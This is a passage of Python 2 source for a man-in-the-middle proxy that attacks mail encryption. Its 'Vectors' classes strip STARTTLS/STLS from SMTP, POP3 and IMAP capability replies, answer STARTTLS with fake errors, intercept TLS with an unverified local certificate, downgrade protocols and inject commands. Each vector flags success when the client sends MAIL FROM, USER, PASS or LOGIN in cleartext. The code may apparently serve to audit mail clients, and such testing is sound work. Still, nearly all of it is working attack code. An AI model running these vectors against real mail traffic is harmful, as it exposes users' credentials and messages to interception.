= True\r\n data_pending = buflen\r\n while chunk and data_pending:\r\n chunk = self.socket_ssl.read(data_pending)\r\n chunks.append(chunk)\r\n data_pending = self.socket_ssl.pending()\r\n self.recvbuf = ''.join(chunks)\r\n else:\r\n self.recvbuf = self.socket.recv(buflen, *args, **kwargs)\r\n return self.recvbuf\r\n \r\n def recv_blocked(self, buflen=8*1024, timeout=None, *args, **kwargs):\r\n force_first_loop_iteration = True\r\n end = time.time()+timeout if timeout else 0\r\n while force_first_loop_iteration or (not timeout or time.time()<end):\r\n # force one recv otherwise we might not even try to read if timeout is too narrow\r\n try:\r\n return self.recv(buflen=buflen, *args, **kwargs)\r\n except ssl.SSLWantReadError:\r\n pass\r\n force_first_loop_iteration = False\r\n \r\n def send(self, data, retransmit_delay=0.1):\r\n if self.socket_ssl:\r\n last_exception = None\r\n for _ in xrange(3):\r\n try:\r\n self.socket_ssl.write(data)\r\n last_exception = None\r\n break\r\n except ssl.SSLWantWriteError,swwe:\r\n logger.warning(\"TCPSockBuff: ssl.sock not yet ready, retransmit (%d) in %f seconds: %s\"%(_,retransmit_delay,repr(swwe)))\r\n last_exception = swwe\r\n time.sleep(retransmit_delay)\r\n if last_exception:\r\n raise last_exception\r\n else:\r\n self.socket.send(data)\r\n self.sndbuf = data\r\n \r\n def sendall(self, data):\r\n if self.socket_ssl:\r\n self.send(data)\r\n else:\r\n self.socket.sendall(data)\r\n self.sndbuf = data\r\n \r\n def ssl_wrap_socket(self, *args, **kwargs):\r\n if len(args)>=1:\r\n args[1] = self.socket\r\n if 'sock' in kwargs:\r\n kwargs['sock'] = self.socket\r\n if not args and not kwargs.get('sock'):\r\n kwargs['sock'] = self.socket\r\n self.socket_ssl = ssl.wrap_socket(*args, **kwargs)\r\n self.socket_ssl.setblocking(0) # nonblocking for select\r\n \r\n def ssl_wrap_socket_with_context(self, ctx, *args, **kwargs):\r\n if len(args)>=1:\r\n args[1] = self.socket\r\n if 'sock' in kwargs:\r\n kwargs['sock'] = self.socket\r\n if not args and not kwargs.get('sock'):\r\n kwargs['sock'] = self.socket\r\n self.socket_ssl = ctx.wrap_socket(*args, **kwargs)\r\n self.socket_ssl.setblocking(0) # nonblocking for select\r\n \r\nclass ProtocolDetect(object):\r\n PROTO_SMTP = 25\r\n PROTO_XMPP = 5222\r\n PROTO_IMAP = 143\r\n PROTO_FTP = 21\r\n PROTO_POP3 = 110\r\n PROTO_NNTP = 119\r\n PROTO_IRC = 6667\r\n PROTO_ACAP = 675\r\n PROTO_SSL = 443\r\n \r\n PORTMAP = {25: PROTO_SMTP,\r\n 5222:PROTO_XMPP,\r\n 110: PROTO_POP3,\r\n 143: PROTO_IMAP,\r\n 21: PROTO_FTP,\r\n 119: PROTO_NNTP,\r\n 6667: PROTO_IRC,\r\n 675: PROTO_ACAP\r\n }\r\n \r\n KEYWORDS = ((['ehlo', 'helo','starttls','rcpt to:','mail from:'], PROTO_SMTP),\r\n (['xmpp'], PROTO_XMPP),\r\n (['. capability'], PROTO_IMAP),\r\n (['auth tls'], PROTO_FTP)\r\n )\r\n \r\n def __init__(self, target=None):\r\n self.protocol_id = None\r\n self.history = []\r\n if target:\r\n self.protocol_id = self.PORTMAP.get(target[1])\r\n if self.protocol_id:\r\n logger.debug(\"%s - protocol detected (target port)\"%repr(self))\r\n \r\n def __str__(self):\r\n return repr(self.proto_id_to_name(self.protocol_id))\r\n \r\n def __repr__(self):\r\n return \"<ProtocolDetect %s protocol_id=%s len_history=%d>\"%(hex(id(self)), self.proto_id_to_name(self.protocol_id), len(self.history))\r\n \r\n def proto_id_to_name(self, id):\r\n if not id:\r\n return id\r\n for p in (a for a in dir(self) if a.startswith(\"PROTO_\")):\r\n if getattr(self, p)==id:\r\n return p \r\n \r\n def detect_peek_tls(self, sock):\r\n if sock.socket_ssl:\r\n raise Exception(\"SSL Detection for ssl socket ..whut!\")\r\n TLS_VERSIONS = {\r\n # SSL\r\n '\\x00\\x02':\"SSL_2_0\",\r\n '\\x03\\x00':\"SSL_3_0\",\r\n # TLS\r\n '\\x03\\x01':\"TLS_1_0\",\r\n '\\x03\\x02':\"TLS_1_1\",\r\n '\\x03\\x03':\"TLS_1_2\",\r\n '\\x03\\x04':\"TLS_1_3\",\r\n }\r\n TLS_CONTENT_TYPE_HANDSHAKE = '\\x16'\r\n SSLv2_PREAMBLE = 0x80\r\n SSLv2_CONTENT_TYPE_CLIENT_HELLO ='\\x01'\r\n \r\n peek_bytes = sock.recv(5, socket.MSG_PEEK)\r\n if not len(peek_bytes)==5:\r\n return\r\n # detect sslv2, sslv3, tls: one symbol is one byte; T .. type\r\n # L .. length \r\n # V .. version\r\n # 01234\r\n # detect sslv2 LLTVV T=0x01 ... MessageType.client_hello; L high bit set.\r\n # sslv3 TVVLL \r\n # tls TVVLL T=0x16 ... ContentType.Handshake\r\n v = None\r\n if ord(peek_bytes[0]) & SSLv2_PREAMBLE \\\r\n and peek_bytes[2]==SSLv2_CONTENT_TYPE_CLIENT_HELLO \\\r\n and peek_bytes[3:3+2] in TLS_VERSIONS.keys():\r\n v = TLS_VERSIONS.get(peek_bytes[3:3+2])\r\n logger.info(\"ProtocolDetect: SSL23/TLS version: %s\"%v)\r\n elif peek_bytes[0] == TLS_CONTENT_TYPE_HANDSHAKE \\\r\n and peek_bytes[1:1+2] in TLS_VERSIONS.keys():\r\n v = TLS_VERSIONS.get(peek_bytes[1:1+2]) \r\n logger.info(\"ProtocolDetect: TLS version: %s\"%v)\r\n return v\r\n \r\n \r\n def detect(self, data):\r\n if self.protocol_id:\r\n return self.protocol_id\r\n self.history.append(data)\r\n for keywordlist,proto in self.KEYWORDS:\r\n if any(k in data.lower() for k in keywordlist):\r\n self.protocol_id = proto\r\n logger.debug(\"%s - protocol detected (protocol messages)\"%repr(self))\r\n return\r\n \r\nclass Session(object):\r\n ''' Proxy session from client <-> proxy <-> server \r\n @param inbound: inbound socket\r\n @param outbound: outbound socket\r\n @param target: target tuple ('ip',port) \r\n @param buffer_size: socket buff size'''\r\n \r\n def __init__(self, proxy, inbound=None, outbound=None, target=None, buffer_size=4096):\r\n self.proxy = proxy\r\n self.bind = proxy.getsockname()\r\n self.inbound = TcpSockBuff(inbound)\r\n self.outbound = TcpSockBuff(outbound, peer=target)\r\n self.buffer_size = buffer_size\r\n self.protocol = ProtocolDetect(target=target)\r\n self.datastore = {}\r\n \r\n def __repr__(self):\r\n return \"<Session %s [client: %s] --> [prxy: %s] --> [target: %s]>\"%(hex(id(self)),\r\n self.inbound.peer,\r\n self.bind,\r\n self.outbound.peer)\r\n def __str__(self):\r\n return \"<Session %s>\"%hex(id(self))\r\n \r\n def connect(self, target):\r\n self.outbound.peer = target\r\n logger.info(\"%s connecting to target %s\"%(self, repr(target)))\r\n return self.outbound.connect(target)\r\n \r\n def accept(self):\r\n sock, addr = self.proxy.accept()\r\n self.inbound = TcpSockBuff(sock)\r\n self.inbound.peer = addr\r\n logger.info(\"%s client %s has connected\"%(self,repr(self.inbound.peer)))\r\n return sock,addr\r\n \r\n def get_peer_sockets(self):\r\n return [self.inbound.socket, self.outbound.socket]\r\n \r\n def notify_read(self, sock):\r\n if sock == self.proxy:\r\n self.accept()\r\n self.connect(self.outbound.peer)\r\n elif sock == self.inbound.socket:\r\n # new client -> prxy - data\r\n self.on_recv_peek(self.inbound, self)\r\n self.on_recv(self.inbound, self.outbound, self)\r\n elif sock == self.outbound.socket:\r\n # new sprxy <- target - data\r\n self.on_recv(self.outbound, self.inbound, self)\r\n return \r\n \r\n def close(self):\r\n try:\r\n self.outbound.socket.shutdown(2)\r\n self.outbound.socket.close()\r\n self.inbound.socket.shutdown(2)\r\n self.inbound.socket.close()\r\n except socket.error, se:\r\n logger.warning(\"session.close(): Exception: %s\"%repr(se))\r\n raise SessionTerminatedException()\r\n \r\n def on_recv(self, s_in, s_out, session):\r\n data = s_in.recv(session.buffer_size)\r\n self.protocol.detect(data)\r\n if not len(data):\r\n return session.close()\r\n if s_in == session.inbound:\r\n data = self.mangle_client_data(session, data)\r\n elif s_in == session.outbound:\r\n data = self.mangle_server_data(session, data)\r\n if data:\r\n s_out.sendall(data)\r\n return data\r\n \r\n def on_recv_peek(self, s_in, session): pass\r\n def mangle_client_data(self, session, data, rewrite): return data\r\n def mangle_server_data(self, session, data, rewrite): return data\r\n \r\nclass ProxyServer(object):\r\n '''Proxy Class'''\r\n \r\n def __init__(self, listen, target, buffer_size=4096, delay=0.0001):\r\n self.input_list = set([])\r\n self.sessions = {} # sock:Session()\r\n self.callbacks = {} # name: [f,..]\r\n #\r\n self.listen = listen\r\n self.target = target\r\n #\r\n self.buffer_size = buffer_size\r\n self.delay = delay\r\n self.bind = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.bind.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n self.bind.bind(listen)\r\n self.bind.listen(200)\r\n \r\n def __str__(self):\r\n return \"<Proxy %s listen=%s target=%s>\"%(hex(id(self)),self.listen, self.target)\r\n \r\n def get_session_by_client_sock(self, sock):\r\n return self.sessions.get(sock)\r\n \r\n def set_callback(self, name, f):\r\n self.callbacks[name] = f\r\n \r\n def main_loop(self):\r\n self.input_list.add(self.bind)\r\n while True:\r\n time.sleep(self.delay)\r\n inputready, _, _ = select.select(self.input_list, [], [])\r\n \r\n for sock in inputready:\r\n if not sock in self.input_list: \r\n # Check if inputready sock is still in the list of socks to read from\r\n # as SessionTerminateException might remove multiple sockets from that list\r\n # this might otherwise lead to bad FD access exceptions\r\n continue\r\n session = None\r\n try:\r\n if sock == self.bind:\r\n # on_accept\r\n session = Session(sock, target=self.target)\r\n for k,v in self.callbacks.iteritems():\r\n setattr(session, k, v)\r\n session.notify_read(sock)\r\n for s in session.get_peer_sockets():\r\n self.sessions[s]=session\r\n self.input_list.update(session.get_peer_sockets())\r\n else:\r\n # on_recv\r\n try:\r\n session = self.get_session_by_client_sock(sock)\r\n session.notify_read(sock)\r\n except ssl.SSLError, se:\r\n if se.errno != ssl.SSL_ERROR_WANT_READ:\r\n raise\r\n continue\r\n except SessionTerminatedException:\r\n self.input_list.difference_update(session.get_peer_sockets())\r\n logger.warning(\"%s terminated.\"%session)\r\n except Exception, e:\r\n logger.error(\"main: %s\"%repr(e))\r\n if isinstance(e,IOError):\r\n for kname,value in ((a,getattr(Vectors,a)) for a in dir(Vectors) if a.startswith(\"_TLS_\")):\r\n if not os.path.isfile(value):\r\n logger.error(\"%s = %s - file not found\"%(kname, repr(value)))\r\n if session:\r\n logger.error(\"main: removing all sockets associated with session that raised exception: %s\"%repr(session))\r\n try:\r\n session.close()\r\n except SessionTerminatedException: pass\r\n self.input_list.difference_update(session.get_peer_sockets())\r\n elif sock and sock!=self.bind:\r\n # exception for non-bind socket - probably fine to close and remove it from our list\r\n logger.error(\"main: removing socket that probably raised the exception\")\r\n sock.close()\r\n self.input_list.remove(sock)\r\n else:\r\n # this is just super-fatal - something happened while processing our bind socket.\r\n raise \r\n \r\nclass Vectors:\r\n _TLS_CERTFILE = \"server.pem\"\r\n _TLS_KEYFILE = \"server.pem\"\r\n \r\n class GENERIC:\r\n _PROTO_ID = None\r\n class Intercept:\r\n '''\r\n proto independent msg_peek based tls interception\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite): return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite): return data\r\n @staticmethod\r\n def on_recv_peek(session, s_in):\r\n if s_in.socket_ssl:\r\n return\r\n \r\n ssl_version = session.protocol.detect_peek_tls(s_in)\r\n if ssl_version:\r\n logger.info(\"SSL Handshake detected - performing ssl/tls conversion\")\r\n try:\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n session.outbound.ssl_wrap_socket_with_context(context, server_side=False)\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n except Exception, e:\r\n logger.warning(\"Exception - not ssl intercepting outbound: %s\"%repr(e))\r\n \r\n @staticmethod\r\n def create_ssl_context(proto=ssl.PROTOCOL_SSLv23, \r\n verify_mode=ssl.CERT_NONE,\r\n protocols=None,\r\n options=None,\r\n ciphers=\"ALL\"):\r\n protocols = protocols or ('PROTOCOL_SSLv3','PROTOCOL_TLSv1',\r\n 'PROTOCOL_TLSv1_1','PROTOCOL_TLSv1_2')\r\n options = options or ('OP_CIPHER_SERVER_PREFERENCE','OP_SINGLE_DH_USE',\r\n 'OP_SINGLE_ECDH_USE','OP_NO_COMPRESSION')\r\n context = ssl.SSLContext(proto)\r\n context.verify_mode = verify_mode\r\n # reset protocol, options\r\n context.protocol = 0\r\n context.options = 0\r\n for p in protocols:\r\n context.protocol |= getattr(ssl, p, 0)\r\n for o in options:\r\n context.options |= getattr(ssl, o, 0)\r\n context.set_ciphers(ciphers)\r\n return context\r\n \r\n class InboundIntercept:\r\n '''\r\n proto independent msg_peek based tls interception\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n # peek again - make sure to check for inbound ssl connections\r\n # before forwarding data to the inbound channel\r\n # just in case server is faster with answer than client with hello\r\n # likely if smtpd and striptls are running on the same segment\r\n # and client is not.\r\n if not session.inbound.socket_ssl:\r\n # only peek if inbound is not in tls mode yet\r\n # kind of a hack but allow additional 0.1 secs for the client\r\n # to send its hello\r\n time.sleep(0.1)\r\n Vectors.GENERIC.InterceptInbound.on_recv_peek(session, session.inbound)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite): \r\n return data\r\n @staticmethod\r\n def on_recv_peek(session, s_in):\r\n if s_in.socket_ssl:\r\n return\r\n \r\n ssl_version = session.protocol.detect_peek_tls(s_in)\r\n if ssl_version:\r\n logger.info(\"SSL Handshake detected - performing ssl/tls conversion\")\r\n try:\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n except Exception, e:\r\n logger.warning(\"Exception - not ssl intercepting inbound: %s\"%repr(e))\r\n \r\n class SMTP:\r\n _PROTO_ID = 25\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and \"250\" in data:\r\n features = [f for f in data.strip().split('\\r\\n') if not \"STARTTLS\" in f]\r\n if not features[-1].startswith(\"250 \"):\r\n features[-1] = features[-1].replace(\"250-\",\"250 \") # end marker\r\n data = '\\r\\n'.join(features)+'\\r\\n' \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithInvalidResponseCode:\r\n ''' 1) Force Server response to contain STARTTLS even though it does not support it (just because we can)\r\n 2) Respond to client STARTTLS with invalid response code\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and \"250\" in data:\r\n features = list(data.strip().split(\"\\r\\n\"))\r\n features.insert(-1,\"250-STARTTLS\") # add STARTTLS from capabilities\r\n #if \"STARTTLS\" in data:\r\n # features = [f for f in features if not \"STARTTLS\" in f] # remove STARTTLS from capabilities\r\n data = '\\r\\n'.join(features)+'\\r\\n' \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"200 STRIPTLS\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"200 STRIPTLS\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithTemporaryError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"454 TLS not available due to temporary reason\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"454 TLS not available due to temporary reason\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"501 Syntax error\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"501 Syntax error\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"220 Go ahead\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"220 Go ahead\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n \r\n # outbound ssl\r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if \"220\" not in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket() \r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class InboundStarttlsProxy:\r\n ''' Inbound is starttls, outbound is plain\r\n 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n # keep track of stripped server ehlo/helo\r\n if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and \"250\" in data and not session.datastore.get(\"server_ehlo_stripped\"): #only do this once\r\n # wait for full line\r\n while not \"250 \" in data:\r\n data+=session.outbound.recv_blocked()\r\n \r\n features = [f for f in data.strip().split('\\r\\n') if not \"STARTTLS\" in f]\r\n if features and not features[-1].startswith(\"250 \"):\r\n features[-1] = features[-1].replace(\"250-\",\"250 \") # end marker\r\n # force starttls announcement\r\n session.datastore['server_ehlo_stripped']= '\\r\\n'.join(features)+'\\r\\n' # stripped\r\n \r\n if len(features)>1:\r\n features.insert(-1,\"250-STARTTLS\")\r\n else:\r\n features.append(\"250 STARTTLS\")\r\n features[0]=features[0].replace(\"250 \",\"250-\")\r\n data = '\\r\\n'.join(features)+'\\r\\n' # forced starttls\r\n session.datastore['server_ehlo'] = data\r\n \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"220 Go ahead\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"220 Go ahead\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # inbound ssl, fake server ehlo on helo/ehlo\r\n indata = session.inbound.recv_blocked()\r\n if not any(e in indata for e in ('ehlo','helo')):\r\n raise ProtocolViolationException(\"whoop!? client did not send EHLO/HELO after STARTTLS finished.. proto violation: %s\"%repr(indata))\r\n logger.debug(\"%s [client] => [ ][mangled] %s\"%(session,repr(indata)))\r\n session.inbound.sendall(session.datastore[\"server_ehlo_stripped\"])\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(session.datastore[\"server_ehlo_stripped\"])))\r\n data=None\r\n elif any(e in data for e in ('ehlo','helo')) and session.datastore.get(\"server_ehlo_stripped\"):\r\n # just do not forward the second ehlo/helo\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class ProtocolDowngradeStripExtendedMode:\r\n ''' Return error on EHLO to force peer to non-extended mode\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.lower().startswith(\"ehlo \"):\r\n session.inbound.sendall(\"502 Error: command \\\"EHLO\\\" not implemented\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"502 Error: command \\\"EHLO\\\" not implemented\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class InjectCommand:\r\n ''' 1) Append command to STARTTLS\\r\\n.\r\n 2) untrusted intercept to check if we get an invalid command response from server\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n data += \"INJECTED_INVALID_COMMAND\\r\\n\"\r\n #logger.debug(\"%s [client] => [server][mangled] %s\"%(session,repr(data)))\r\n try:\r\n Vectors.SMTP.UntrustedIntercept.mangle_client_data(session, data, rewrite)\r\n except ssl.SSLEOFError, se:\r\n logging.info(\"%s - Server failed to negotiate SSL with Exception: %s\"%(session, repr(se))) \r\n session.close()\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class POP3:\r\n _PROTO_ID = 110\r\n \r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STLS support\r\n 2) raise exception if client tries to negotiated STLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if data.lower().startswith('+ok capability'):\r\n features = [f for f in data.strip().split('\\r\\n') if not \"stls\" in f.lower()]\r\n data = '\\r\\n'.join(features)+'\\r\\n'\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.lower().startswith(\"stls\"):\r\n raise ProtocolViolationException(\"whoop!? client sent STLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif any(c in data.lower() for c in ('list','user ','pass ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"stls\" == data.strip().lower():\r\n session.inbound.sendall(\"-ERR unknown command\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"-ERR unknown command\\r\\n\")))\r\n data=None\r\n elif any(c in data.lower() for c in ('list','user ','pass ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"stls\"==data.strip().lower():\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"+OK Begin TLS negotiation\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"+OK Begin TLS negotiation\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_CERTFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if \"+OK\" not in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif any(c in data.lower() for c in ('list','user ','pass ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class IMAP:\r\n _PROTO_ID = 143\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \"CAPABILITY \" in data:\r\n # rfc2595\r\n data = data.replace(\" STARTTLS\",\"\").replace(\" LOGINDISABLED\",\"\")\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \" LOGIN \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.strip().lower().endswith(\"starttls\"):\r\n id = data.split(' ',1)[0].strip()\r\n session.inbound.sendall(\"%s BAD unknown command\\r\\n\"%id)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%s BAD unknown command\\r\\n\"%id)))\r\n data=None\r\n elif \" LOGIN \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class ProtocolDowngradeToV2:\r\n ''' Return IMAP2 instead of IMAP4 in initial server response\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if all(kw.lower() in data.lower() for kw in (\"IMAP4\",\"* OK \")):\r\n session.inbound.sendall(\"OK IMAP2 Server Ready\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"OK IMAP2 Server Ready\\r\\n\")))\r\n data=None\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.strip().lower().endswith(\"starttls\"):\r\n id = data.split(' ',1)[0].strip()\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"%s OK Begin TLS negotation now\\r\\n\"%id)\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"%s OK Begin TLS negotation now\\r\\n\"%id)))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_CERTFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n 